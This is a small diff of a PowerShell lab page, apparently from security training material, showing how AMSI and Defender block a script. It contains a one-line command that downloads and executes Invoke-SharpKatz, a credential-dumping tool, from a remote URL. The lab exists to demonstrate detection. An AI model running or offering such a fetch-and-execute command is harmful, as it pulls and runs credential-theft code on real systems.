crimsoncore/thev/src/lab_powershell.md

 IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/crimsoncore/Invoke-SharpKatz/refs/heads/main/Invoke-SharpKatz.ps1");Invoke-SharpKatz
 ```

-We'll see the script won't execute since AMSI has scanned it and determined it as malicious:
+We'll see the script won't execute since AMSI intercepted it before executing and has sent it to Defender that scanned it and determined it as malicious:

 ![image](./images/ps_invokesharkpkatzblocked.jpg)